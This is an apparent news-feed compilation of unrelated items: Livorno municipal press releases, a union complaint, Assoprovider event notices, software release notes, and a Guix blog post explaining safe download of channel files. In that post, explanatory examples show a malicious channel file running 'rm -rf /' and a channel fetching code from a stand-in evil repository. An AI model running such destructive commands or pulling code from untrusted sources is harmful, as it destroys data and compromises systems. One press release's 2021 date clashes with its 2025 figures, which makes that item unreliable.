L’Assessora Cepparello ha parlato degli aspetti pratici e sociali del provvedimento sottolineando come l’ordinanza nasca anche per tutelare le persone con disabilità motoria, che spesso sporcano i propri ausili (sedie a rotelle) sui marciapiedi non puliti, portando poi lo sporco in casa. “I proprietari dei cani devono munirsi di bottigliette o spruzzatori con semplice acqua (senza sapone) da usare sui punti interessati dalle deiezioni liquide”. Ha ricordato il divieto assoluto di far urinare i cani ridosso di portoni, accessi ad abitazioni. “Si è optato per un’ordinanza, per agire tempestivamente prima dell’estate, quando il calore accentua i cattivi odori. L’ordinanza prevede una scadenza, ma recepiremo questo provvedimento all’interno di un regolamento in modo che l’obbligo delle bottigliette diventi permanente in tutte le stagioni e i mesi dell’anno. Il Comune non può lavare quotidianamente centinaia di chilometri di strade e la collaborazione dei cittadini è strategica”.
La Garante degli Animali ha posto l’accento sulla salute pubblica e sulla sicurezza nei parchi. Ha evidenziato che le deiezioni non raccolte contengono batteri e parassiti pericolosi per gli animali e soprattutto per i bambini che giocano nei prati. Ha citato situazioni di particolare degrado riscontrate nella zona di San Jacopo e vicino alla Baracchina Bianca, “dove i muri sono sporchi e i marciapiedi pieni di deiezioni solide”. Ha richiamato l’obbligo del guinzaglio nei luoghi pubblici, denunciando episodi di maleducazione subiti quando ha cercato di far rispettare questa norma. Infine ha esortato i cittadini a un maggiore rispetto per l’ambiente e per la città, sottolineando che il decoro urbano è un dovere di ogni proprietario.
Andrea Valenti, responsabile Decoro Urbano AAMPS/Retiambiente ha affermato: “Aamps si muove su due versanti: pulizia e sensibilizzazione al cittadino. In entrambi i casi abbiamo favorito un potenziamento dei servizi, pertanto forniamo un contributo determinante alla cura della città anche per contrastare il fenomeno dell’abbandono delle deiezioni canine. Siamo anche prossimi all’acquisto di 100 contenitori dedicati che avranno una bocca di ingresso dei sacchini molto piccola e, pertanto, non potranno essere utilizzati impropriamente per l’inserimento di sacchi invece destinati alla raccolta dei rifiuti. Nel mese di giugno provvederemo all’installazione presso le aree di sgambatura dei cani, i parchi pubblici e nelle zone che, dalle segnalazioni pervenute, risultano più soggetto a questa tipologia di abbandono”.
L'articolo Deiezioni liquide: da domani obbligo di rimuoverle proviene da Aamps Livorno.

Comunicato a cura dell’uff. Stampa del Comune di Livorno.
Livorno, 18 maggio 2021 – Negli ultimi anni le società partecipate del Comune
di Livorno hanno consolidato risultati positivi sotto il profilo economico,
gestionale e della qualità dei servizi erogati ai cittadini, confermando il valore
strategico del sistema pubblico locale e la capacità delle aziende di affrontare le
sfide dell’innovazione, della sostenibilità e dell’efficienza amministrativa.
Il quadro che emerge dai bilanci evidenzia una crescita costante della solidità
patrimoniale e organizzativa di realtà fondamentali per il territorio come
Esteem Srl, Casalp Spa, AAMPS Spa, Farma.Li Srl e ASA Spa. I bilanci 2025,
alcuni dei quali in corso di approvazione in questi giorni ed entro il 30 giugno,
come previsto dal Codice Civile, non fanno eccezione, ma anzi confermano
questo trend positivo.
In particolare, AAMPS Spa ha registrato bilanci in utile negli ultimi cinque
esercizi, confermando il raggiungimento di un equilibrio economico e
finanziario stabile dopo il percorso di risanamento completato negli anni
precedenti.
Anche Casalp Spa ha dimostrato un consolidamento del ruolo operativo svolto
per i Comuni dell’area livornese ed in particolare si è distinta in questi anni per
le azioni di recupero delle morosità e per la capacità di guidare, su un tema
complesso ed attuale come quello dell’abitare, politiche finalizzate a gestire un
ambito che è sempre più lontano dalla gestione patrimoniale e sempre più
vicino a quello sociale.
Positivi anche i segnali provenienti da ASA Spa, che continua a rappresentare
un presidio essenziale per lo sviluppo infrastrutturale e ambientale del
territorio, mantenendo elevati standard di servizio e una struttura societaria
solida.
Crescita significativa anche per Esteem Srl, realtà attiva nei servizi informatici,
nel supporto alla gestione dei tributi comunali e nella gestione della sosta a
pagamento, che negli ultimi esercizi ha registrato un incremento del fatturato e
dell’occupazione, rafforzando il proprio ruolo di supporto tecnologico alla
pubblica amministrazione locale, confermando di essere una struttura in
espansione e capace di innovare i servizi digitali rivolti ai cittadini.
Importanti risultati sono stati raggiunti inoltre da Farma.Li Srl, con i propri
bilanci che negli ultimi anni evidenziano una gestione economica positiva e un
progressivo rafforzamento della capacità finanziaria dell’azienda. Farma.Li ha
proseguito il percorso di ammodernamento delle farmacie comunali, puntando
sulla qualità dell’assistenza, sulla prossimità territoriale e sull’innovazione dei
servizi sanitari e socioassistenziali.
Nel complesso, il sistema delle partecipate del Comune di Livorno conferma
dunque una traiettoria positiva, caratterizzata da investimenti, equilibrio
economico e miglioramento della qualità dei servizi pubblici locali. Un
patrimonio amministrativo e industriale che rappresenta un elemento
strategico per la crescita della città, per la tutela dell’interesse pubblico e per la
capacità del territorio di affrontare con solidità le sfide future.
Il sindaco Luca Salvetti ha aperto l’incontro sottolineando come le società
partecipate siano uno strumento imprescindibile per la gestione della città e dei
servizi ai cittadini. “Abbiamo lavorato sette anni sulla riorganizzazione e
l’aumento del personale, presentando numeri eloquenti, lo dimostrano i bilanci
in utile. Tutte e cinque le società principali (ASA, AMS, Farmali, Casalp e
Steam) hanno chiuso l’anno in positivo.
Il valore complessivo della produzione è di 208 milioni di euro, con un
incremento di 29 milioni rispetto al 2019.
Le aziende hanno raggiunto quota 1143 di personale con un aumento di 193
unità rispetto al 2019, diventando la terza realtà lavorativa del territorio dopo
l’ASL e il Comune stesso”.L’Assessora al Bilancio con delega alle Società Partecipate Viola Ferroni ha
ringraziato l’Ufficio Società Partecipate, che ha definito la “spina dorsale” dei
risultati ottenuti. “Ribadisco l’importanza della governance pubblica per
perseguire obiettivi di interesse collettivo, andando oltre il semplice dato di
bilancio. Farmali ha concentrato il focus sulla vicinanza ai cittadini ed alla
ristrutturazione delle farmacie. Casalp ha ottenuto buoni risultati nel recupero
crediti e nell’efficientamento degli alloggi. Esteem ha incrementato i servizi,
inclusa la recente gestione della sosta a pagamento. Aamps ha raggiunto la
stabilità dopo un passato complicato che ha fatto “tribolare”
l’Amministrazione”.Il direttore generale del Comune Nicola Falleni ha evidenziato il superamento
delle storiche criticità finanziarie delle partecipate: “che in passato
rappresentavano un “neo” nel bilancio comunale” ed ha fornito i dati del
bilancio consolidato 2024.“Il “gruppo” (Comune + aziende) conta oltre 2.200 dipendenti. Valore della
produzione totale: quasi 570 milioni di euro. Utile consolidato: circa 14 milioni
di euro. Patrimonio netto: 763 milioni di euro”.Aldo Iacomelli, Amministratore Unico AAMPS/Retiambiente ha dichiarato:
“Presenti e affidabili: con questi due aggettivi e in estrema sintesi sono nella
possibilità di descrivere la nostra azienda nel panorama delle municipalizzate
locali. Ogni giorno contribuiamo al decoro urbano con grande impegno e sforzo
da parte dei nostri operatori garantendo l’erogazione di servizi efficienti fin
dalle primissime ore della mattina sia sul versante della raccolta sia su quello
dello spazzamento. É importante sottolineare che per l’anno 2025 ci avvaliamo
di un utile di bilancio di 252mila euro. Un risultato che reputiamo importante
da affiancare all’evidenza di non avere registrato debiti. Siamo quindi orgogliosi
per quanto stiamo riuscendo complessivamente a fare, con uno sguardo di
ulteriore fiducia anche sul versante operativo essendo prossimi a realizzare,
avvalendoci anche di finanziamenti da parte della Regione Toscana, di due
ulteriori centri di raccolta per il corretto conferimento dei rifiuti dei cittadini. A
breve lanceremo anche una campagna di comunicazione rivolta a tutta la
cittadinanza per stringere ulteriormente il patto con i cittadini nel contrastare il
fenomeno degli abbandoni e aumentare le migliori azioni per la riduzione nella
produzione dei rifiuti indifferenziati, per la quale stiamo già registrando risultati
lusinghieri”.Claudio Puccetti, amministratore unico di Farmali ha definito l’azienda con gli
aggettivi “tranquillo” e “partecipativo”.
Ha sottolinea il buon clima lavorativo tra i 60 dipendenti distribuiti su 9
farmacie. Ha messo in risalto la totale autonomia finanziaria della società, “che
permette di autofinanziare gli investimenti (come le ristrutturazioni di varie
farmacie) senza ricorrere a finanziamenti esterni.L’obiettivo futuro è spostare
la missione del farmacista sempre più verso i servizi di telemedicina”.Marcello Canovaro presidente di Casalp ha utilizzato gli aggettivi “rigoroso” e
“partecipato” per definire il bilancio della società.
“La società ha superato pesanti difficoltà iniziate nel 2019 e ora chiude il
bilancio in positivo. Casalp non punta all’utile, ma a reinvestire ogni risorsa nel
mantenimento del patrimonio e in nuovi edifici.
Negli ultimi tre anni sono stati investiti oltre 50 milioni di euro nella provincia e
messi a disposizione degli assegnatari 592 appartamenti precedentemente
sfitti”.Stefano Taddia presidente di Asa sceglie gli aggettivi “collettivo” e “sostenibile”.
Esprime orgoglio per i 56,7 milioni di euro di investimenti effettuati nell’ultimo
anno, segnando un +150% rispetto al 2020.
Sottolinea come l’efficienza delle società di servizio pubblico sia un elemento
fondamentale per la sostenibilità e il benessere del territorio.Antonio Paladini amministratore unico di Esteem descrive l’azienda come
“consolidata” e “visionaria”.
Riporta una crescita enorme negli ultimi 12 anni: “il personale è passato da 9 a
40 dipendenti e il fatturato è salito da circa 450.000 euro a quasi 2 milioni di
euro. L’azienda si è evoluta accettando servizi nuovi e diversi, come la gestione
dei parcheggi, mantenendo però un’anima orientata all’innovazione informatica
per il futuro dei servizi ai cittadini”.Il Sindaco ha concluso la conferenza stampa ringraziando gli Uffici Comunali e i
due assessori che si sono succeduti nella gestione delle partecipate, Gianfranco Simoncini e Viola Ferroni.
L'articolo Bilanci in utile delle cinque aziende partecipate del Comune di Livorno proviene da Aamps Livorno.


bookworm). This point release mainly adds corrections for security issues, along with a few adjustments for serious problems. Security advisories have already been published separately and are referenced where available.
trixie). This point release mainly adds corrections for security issues, along with a few adjustments for serious problems. Security advisories have already been published separately and are referenced where available.
Le Organizzazioni Sindacali USB Livorno e COBAS Lavoro Privato Livorno denunciano un fatto che ritengono estremamente grave, verificatosi in data 12 maggio 2026, presso la sede dell’Ispettorato Territoriale del Lavoro di Livorno, durante un tentativo di conciliazione tra la Cooperativa COOPLAT e cinque lavoratrici impiegate nell’appalto della committenza Unicoop Firenze presso il cantiere Fonti del Corallo – Via Gino Graziani - Livorno.
Il tentativo di conciliazione era stato richiesto dall’Organizzazione Sindacale al fine di sanare una situazione di applicazione irregolare dei turni che si protrae nel cantiere da anni, nonché per ottenere la regolarizzazione degli orari e la corretta applicazione del contratto di lavoro in essere.
Nel corso dell’ultimo dei tre incontri svolti presso l’ITL, la cooperativa ha presentato nuove proposte di variazione oraria che le lavoratrici, con il supporto delle OO.SS., hanno valutato come difficilmente accettabili, poiché relative a turni residuali rispetto a fasce orarie già assegnate ad altre lavoratrici che, a seguito del cambio di committenza, avevano prontamente sottoscritto le variazioni proposte dall’azienda. Tali modifiche, di fatto, formalizzavano orari già praticati senza alcuna regolarità rispetto ai contratti in essere, che peraltro non prevedono clausole elastiche o flessibili.
Durante l’ultimo incontro, a fronte della decisione di una lavoratrice di non sottoscrivere una proposta ritenuta peggiorativa rispetto alle condizioni del contratto vigente, la rappresentante legale della cooperativa si è espressa in modo non esplicito ma chiaramente udibile, chiedendo al responsabile delle risorse umane di attivare il licenziamento. Un’ipotesi già ventilata nei precedenti incontri e ormai diffusamente percepita nel cantiere tra le lavoratrici.
Riteniamo l'accaduto di una gravità inaudita e inaccettabile, resa ancor più intollerabile dal fatto di essersi verificato, sfacciatamente, all'interno di una sede istituzionale, in violazione di ogni principio di lealtà e correttezza.
Le rappresentanti sindacali presenti e la legale di riferimento non hanno ritenuto possibile far sottoscrivere alla lavoratrice alcun accordo né proseguire la discussione sulle ulteriori proposte, poiché la procedura non appariva genuina né realmente tutelante. La mancata accettazione della variazione oraria esponeva concretamente le lavoratrici al rischio di licenziamento, in un contesto caratterizzato da un’elevata discrezionalità aziendale, con possibili profili discriminatori legati all’essere o meno socia della cooperativa e a valutazioni puramente soggettive sul comportamento delle lavoratrici, considerate più o meno “compiacenti” nei confronti di responsabili e dirigenti.
Il tentativo di conciliazione si è ovviamente concluso con esito negativo. Le Organizzazioni Sindacali si riservano pertanto di attivare tutti gli strumenti sindacali a propria disposizione per rivendicare la tutela dei diritti delle lavoratrici e chiedono alla committenza di vigilare sull’appalto, assumendo una posizione chiara rispetto a comportamenti che ledono la qualità del lavoro e la dignità delle lavoratrici, molte delle quali operano da anni alle dipendenze della cooperativa anche in qualità di socie lavoratrici.
Unicoop Firenze, peraltro, è già stata più volte chiamata in causa e sollecitata a intervenire e a esprimersi nell’ambito di questo conflitto, sia indirettamente da COOPLAT, che ha ripetutamente dichiarato la necessità di modificare i turni per richieste ed esigenze della committenza stessa, sia direttamente dai sindacati, che hanno provveduto a informarla delle criticità emerse e delle conseguenze che tali scelte stanno producendo sulle condizioni di lavoro delle lavoratrici coinvolte, richiedendo inoltre un incontro finalizzato ad aprire un confronto congiunto sulla gestione dell’appalto e delle condizioni di lavoro nel cantiere di Porta a Terra.
Riteniamo inaccettabile quanto accaduto e lesivo del ruolo e della funzione di una sede istituzionale nella quale la mediazione è finalizzata a garantire tutela ed equilibrio tra tutte le parti coinvolte. Chiediamo il rispetto delle sedi, dei ruoli e di relazioni sindacali improntate alla correttezza, nelle quali non può trovare spazio alcuna forma, esplicita o velata, di minaccia di licenziamento nei confronti di chi non intenda sottoscrivere u
na proposta aziendale ritenuta peggiorativa rispetto alle condizioni precedenti, soprattutto nel momento in cui viene richiesto il rispetto del contratto.
Nessuna lavoratrice può essere lasciata indietro!

In the recent weeks I've been engaging Prot as an Emacs coach to help
with doing review passes over my upcoming ffs package as I work on
polishing and documenting it in preparation for offering it for
inclusion in GNU ELPA.
UPDATE 2026-05-15 08:50:10 -0400: Prot also published an article about our session on his website: https://protesilaos.com/codelog/2026-05-15-emacs-amin-bandali-ffs-display-buffer-org-capture/
Today we had our third session where we started by reviewing and
talking about my recent changes to ffs, then ventured to other
Emacs-related topics with the overarching theme of the flexibility
and extensibility of GNU Emacs, including display-buffer-alist,
keyboard macros, defining a custom ox-bhtml Org export backend
derived from Org's ox-html for ultimate flexibility when exporting
my site's pages from Org to HTML, Org capture, plain text files and
Emacs's diary and how it compares to org-agenda, and keeping a
journal with the help of Emacs.
Here is the video recording of our session, which I share with Prot's permission:
You can view or download the full-resolution video from the Internet Archive.
Lastly, here is the snippet Prot shared for having Isearch treat space as a wildcard, helpful for more easily matching multiple parts of a line:
(setq search-whitespace-regexp ".*?")
(setq isearch-lax-whitespace t)
(setq isearch-regexp-lax-whitespace nil)
Take care, and so long for now.

Dal 19 al 21 maggio, al Polo Fibonacci dell’Università di Pisa, tre giorni con gli esperti di reti e innovazione digitale
Vincenzo Gallotto sarà tra i relatori di APMAT2026, l’evento nazionale di Assoprovider in programma il 5 giugno 2026 a Matera, presso Casa Cava. Avvocato, Data Protection Officer, consulente legale di Assoprovider e Responsabile delle liste AP-LEGAL e AP-CHATLEGAL, Gallotto interverrà sul tema “NIS2 – opportunità e percorso di adeguamento per gli operatori”. La Direttiva NIS2, […]
L'articolo Vincenzo Gallotto ad APMAT2026: NIS2, opportunità e percorso di adeguamento per gli operatori proviene da Assoprovider.
A test release of GNUtrition, 0.33.0rc2, is now available.
GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release makes some fixes to the gender option. It also applies a fix to ./version.sh that affected builds from CVS checkouts, which was not an issue with the tarball, due to the tarballs including the version in a .ver file.
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org> (https://lists.gnu ... fo/bug-gnutrition).
Terra Infecta di Andrea Bagnato (Mack, 2026) è una controstoria dei paesaggi urbani e rurali italiani. Ricostruisce la distruzione delle zone umide venete, le politiche di «risanamento» urbano e spostamenti di popolazione a Napoli e Materia, e il periodo del confinamento in Lombardia durante la pandemia di Covid. Il libro è al tempo stesso una critica dell'igiene come dispositivo di controllo e una raccolta di momenti rivelatori di comunità, guarigione e resistenza.
Il 27 aprile 2026 Bagnato ha presentato Terra Infecta alla libreria Modo Infoshop di Bologna, affiancato da Chiara Davino, architetta e ricercatrice all'Università di Bologna, e Wu Ming 1. Buon ascolto.
APMAT26 rafforza il dialogo tra operatori indipendenti a livello europeo. Tra i protagonisti dell’evento nazionale di Assoprovider ci sarà anche AOTEC, l’associazione spagnola degli operatori locali TLC, punto di riferimento nel panorama europeo delle reti indipendenti. AOTEC riunisce imprese che, come molti associati Assoprovider, portano connettività, fibra, servizi digitali e innovazione nei territori, spesso dove […]
L'articolo AOTEC è partner internazionale di APMAT2026 proviene da Assoprovider.
APMAT26 amplia il confronto tra operatori e produttori di tecnologia. Tra gli sponsor dell’evento nazionale di Assoprovider ci sarà anche Tenda, realtà internazionale specializzata nello sviluppo e nella distribuzione di soluzioni per il networking. L’azienda propone un’offerta completa che include router Wi-Fi, sistemi mesh, switch, gateway, soluzioni per reti business ed enterprise wireless, CPE, base […]
L'articolo Tenda è sponsor di APMAT2026 proviene da Assoprovider.
APMAT26 rafforza il suo respiro internazionale. Tra gli sponsor dell’evento nazionale di Assoprovider ci sarà anche ALEA Soluciones, realtà spagnola specializzata nello sviluppo di soluzioni tecnologiche per operatori TLC, con una lunga esperienza a supporto di ISP, WISP e operatori locali. La presenza di ALEA contribuirà ad arricchire il confronto tra operatori indipendenti italiani ed […]
L'articolo ALEA Soluciones è sponsor di APMAT2026 proviene da Assoprovider.
APMAT26 continua il suo percorso insieme alle realtà che negli anni hanno accompagnato la crescita della community degli operatori di prossimità. Tra gli sponsor dell’edizione 2026 ci sarà anche SICE Telecom, azienda storica del settore TLC specializzata in soluzioni wireless, ponti radio, infrastrutture per WISP e ISP e distribuzione di tecnologie per reti professionali. Da […]
L'articolo SICE Telecom è sponsor di APMAT2026 proviene da Assoprovider.
APMAT26 continua a costruire connessioni tra operatori, tecnologie e visioni europee. Tra gli sponsor dell’edizione 2026 ci sarà anche Vayu, realtà italiana specializzata nello sviluppo di software e servizi di consulenza per ISP e WISP, con soluzioni dedicate agli operatori wired e wireless. Un’azienda che negli anni ha sviluppato un approccio fortemente orientato alle esigenze […]
L'articolo Vayu: sponsor APMAT 2026 proviene da Assoprovider.
APMAT26 ospiterà l’intervento dell’On. Enzo Amich, Deputato della Repubblica, membro della IX Commissione Trasporti, Poste e Telecomunicazioni della Camera dei Deputati e Presidente dell’Intergruppo parlamentare “Sostenibilità Digitale e Sovranità Tecnologica”. La sua partecipazione assume per Assoprovider un valore particolarmente significativo, perché rafforza un dialogo istituzionale aperto da tempo sui temi delle telecomunicazioni, delle infrastrutture digitali […]
L'articolo On. Enzo Amich ad APMAT26: infrastrutture digitali, territori e sovranità tecnologica proviene da Assoprovider.
APMAT26 ospiterà l’intervento di Gonzalo Elguezabal Ayala, rappresentante di AOTEC, l’associazione spagnola degli operatori locali di telecomunicazioni. La presenza di AOTEC rappresenta uno dei passaggi più significativi dell’edizione 2026: per la prima volta, il confronto promosso da Assoprovider si apre in modo strutturato al dialogo con una realtà associativa europea molto vicina all’esperienza degli Operatori […]
L'articolo Gonzalo Elguezabal Ayala ad APMAT26: il confronto europeo con AOTEC proviene da Assoprovider.
APMAT26 ospiterà l’intervento di José Carlos Oya Ortega, CEO di 7Play, che porterà all’evento la propria esperienza diretta come Operatore di Prossimità nel mercato spagnolo delle telecomunicazioni. La sua presenza rappresenta un’occasione importante per rafforzare il confronto tra operatori italiani e spagnoli, mettendo al centro esperienze concrete, modelli di crescita, strategie commerciali e sfide operative […]
L'articolo José Carlos Oya Ortega ad APMAT26: l’esperienza di 7Play nel mercato telco spagnolo proviene da Assoprovider.
APMAT26 ospiterà l’intervento di Pere Antentas Costa, CEO di Rede Aberta, una delle realtà più interessanti del panorama spagnolo delle telecomunicazioni territoriali. La sua presenza arricchirà il confronto internazionale dell’evento, offrendo agli Operatori di Prossimità italiani l’opportunità di conoscere da vicino un modello di sviluppo fondato su fibra ottica, accesso aperto, copertura delle aree rurali […]
L'articolo Pere Antentas Costa ad APMAT26: l’esperienza di Rede Aberta per le reti territoriali europee proviene da Assoprovider.
APMAT26 vedrà la partecipazione di Antonio Prado, Consulente Tecnico di Assoprovider e figura di riferimento nel panorama italiano delle reti e delle infrastrutture Internet. Dottore di ricerca in Computer Science, con un Master universitario di II livello in Innovazione nella Pubblica Amministrazione, Antonio Prado è ricercatore esterno presso il Dipartimento di Ingegneria dell’Informazione dell’Università di […]
L'articolo Antonio Prado ad APMAT26: competenze tecniche al servizio degli Operatori di Prossimità proviene da Assoprovider.
APMAT26 ospiterà l’intervento di Livio Morina, Presidente di PeeringDB e professionista con una lunga esperienza nel mondo delle reti, dell’interconnessione e delle infrastrutture Internet. La sua presenza porterà all’evento un contributo tecnico di grande valore su temi molto concreti per gli Operatori di Prossimità: AS Number, peering, interconnessione, aggiornamento dei dati di rete, visibilità internazionale […]
L'articolo Livio Morina, Presidente PeeringDB, ad APMAT26 proviene da Assoprovider.
When offered the option to run other people’s code, a prime
consideration is often ease of deployment. While much progress has been
made in support of rapid deployment, the security implications of those
quick deployments is often overlooked. In this post, we look at a new
feature of guix time-machine and guix pull in support of one-line
deployment commands: the ability to download channel files, but without
compromising on security.
The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.
As an example, let’s assume you want to run
yt-dlp as packaged in
the latest Guix revision without upgrading your system or going through
an explicit installation step. The simplest way to do that is with this
command:
guix time-machine -q -- shell yt-dlp -- yt-dlp …If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:
nix shell nixpkgs#yt-dlp --command yt-dlp …In both cases, we’re fetching the latest revision of the package
collection (the master branch for Guix, the nixpkgs-unstable branch
of Nixpkgs for Nix) and running yt-dlp from there. (nix run
goes one step further by removing the need to specify the command name.)
Now, that was an easy example because yt-dlp comes from Guix itself.
What if you’d like to deploy an application that’s in another channel
such as Guix-Science?
Well, you would first need to come up with a channels.scm file for
Guix-Science and then you
can pass it to guix pull or guix time-machine:
$EDITOR channels.scm
# Make sure that includes Guix-Science.
guix time-machine -C channels.scm -- shell …If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:
wget -O channels.scm \
https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell …You can even do it in a single command using Bash process substitution!
guix time-machine \
-C <(wget -O https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
-- shell …Is it a good idea though?
If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to it:
downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise
for wget—that you’re downloading from the genuine github.com doesn’t
tell you anything about the trustworthiness of the code you’re running.
In the case of Guix, the channels.scm you’re downloading could very
well read this:
(system* "rm" "-rf" "/") ;uh-oh!Here system*, as you might have guessed, invokes a
command.
Because yes, channel files can contain arbitrary Scheme code! (It’s
worth noting that this particular problem is one Nix doesn’t have: Nix
being a domain-specific language (DSL) already limits what Nix code can
do, especially with so-called “pure� evaluation.)
Or it could read something like this:
(list (channel
(name 'guix)
;; This is Mallory’s malicious Guix, now you’re PWND!
(url "https://example.org/EVIL/guix.git")
(branch "master")
(introduction
(make-channel-introduction
"badc0ffeed807b096b48283debdcddccfea34bad"
(openpgp-fingerprint
"DEAD CABB A99E F6A8 0D1D E643 A2A0 6DF2 A33A BADD")))))In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.
So no: downloading a channel file and using it without checking it is not reasonable.
Can we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?
Changes that have just landed in guix pull and guix time-machine aim
to address these seemingly contradictory needs. The two commands are
now equipped to download by themselves: just pass them a URL with the
-C (or --channels) option.
guix time-machine \
-C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
-- …Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.
First, channel code is now evaluated in a “sandbox�: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.
With this in place, evaluating a channel file can be considered safe.
Now, one problem remains: the file might list channels that I as a user
do not trust. And here we see a tension between fetching channel files
from out there and keeping one’s system safe. To address that, we
define a new rule: only trusted channels may be deployed; if a channel
file lists untrusted channels, guix pull and guix time-machine error
out. Trusted channels are defined as follows:
~/.config/guix/trusted-channels.scm, if
it exists—this file lists channels just like a regular channel file;guix describe.This brings us to the interesting question of channel identity. This
channel I call guix-science in my trusted-channels.scm, someone else
might as well call it Guix-Science or science; how can I tell if
we’re dealing with the channel that I call guix-science and that I
trust?
The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction� of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction the thing with hexadecimal strings that appears in a channel specification:
(channel
(name 'guix-past)
(url "https://codeberg.org/guix-science/guix-past")
(introduction ;this hex soup 👇 is the channel’s identity
(make-channel-introduction
"0c119db2ea86a389769f4d2b9c6f5c41c027e336"
(openpgp-fingerprint
"3CE4 6455 8A84 FDC6 9DB4 0CFB 090B 1199 3D9A EBB5"))))Two channels with the same introduction are one and the same. Thus, if
my trusted-channels.scm contains a channel with the above
introduction, pull and time-machine will happily pull from it.
The corollary is that a channel that cannot be authenticated—i.e., that
lacks the introduction field—cannot be considered a trusted channel.
Overall, this “trusted channel� rule trades flexibility for safety.
It’s a tradeoff but one that looks like a better default than anything
that effectively amounts to arbitrary code execution à la curl | sh.
“Why would I want to download channel files?�, you may ask? Here’s a list of typical use cases we have in mind.
The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:
guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=masterLikewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:
guix time-machine \
-C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
-- shell rstudio -- rstudioA second, similar use case is one-line commands for demos: if you’re
developing an application, you can package it, publish a channel file,
and share a time-machine command to spawn it. With pinned
channels,
you can ensure users run it from a known-good state.
A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as a channel files where each channel is pinned. This is what the Guix-Science project recently decided to do.
In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!
The fifth use case is reproducible
research.
A computational workflow can be
captured
by two files: channels.scm and manifest.scm. In some cases, we
might as well download the channel file.
But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?
As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content�—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive and so all we had to do is connect the dots.
Consider this command:
guix time-machine \
-C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002 \
-- …It downloads the channel file identified by the given SWHID and then proceeds.
The SWHID serves as an unambiguous and unique content address to refer
to a specific channel set. It can be computed using guix hash,
but of course, the channel file must first be present in the Software
Heritage archive. Thus, if the file is part of a version-control
repository, you can first request archiving of that
repository. In a research
paper, one may include a single command to re-run computations the paper
builds upon.
This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guile’s “sandboxing�, channel authentication, and Software Heritage integration.
The whole endeavor—allowing for quick deployment without compromising on
security—might sound quixotic or, some might say, anachronistic, at a
time when the
pips, the
npms,
the
snaps
and many more are all about deploying software of unknown origin like
there’s no tomorrow. In Guix we do believe that transparency,
provenance tracking, and verifiability matter for the software we run;
efforts like this one are guided by these principles.
The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!
I am grateful to Caleb “Reepca� Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.


This is a major release.
Feature highlights✨:
cli/purge.php to apply purge policy from command lineBug fixes highlights 🐛:
Security highlights 🛡:
UI highlights 🖼:
Extensions highlights 🧩:
This release has been made by @Alkarex, @Inverle, @Kiblyn11, @math-GH, @rupakbajgain, @xtmd and newcomers @polybjorn, @olivluca, @tomasodehnal, @PeterVavercak, @mrtnrdl, @ale-rt, @cweiske, @rid3r45, @gabbihive, @drosell271, @Kachelkaiser, @zanivann, @nanos, @bowencool, @pe1uca, @matheusroberson, @DenuxPlays, @rlrs, @chanse-syres, @IEEE-754, @umaidshahid, @michi-onl
Full changelog:
mdate:P1D for finding articles modified by the author / server during the past day.toString in case of regex-looking string #8479<iframe> referrer allow list #8672allowfullscreen to <iframe> #8467Set-Cookie using native PHP support of SameSite #8447, #8778
session.cookie-lifetime in php.ini<meta name="referrer" content="no-referrer" /> from deprecated never #8725.content pre code #8620Minz_HookType::ActionExecute #8599, #8603Minz_HookType as hook name in registerHook() #8600httpGet() #8700httpGet() cache nullable #8705select-input-changer JavaScript helper #8721get_icon_url() for feed favicon simplepie#974get_thumbnail() #8634, simplepie#970cli/purge.php to apply purge policy #8740timeago() #8670AGENTS.md, SKILLS.md, instructions.md #8478

In the recent weeks I've been engaging Prot as an Emacs coach to help
with doing review passes over my upcoming ffs package as I work on
polishing and documenting it in preparation for offering it for
inclusion in GNU ELPA.
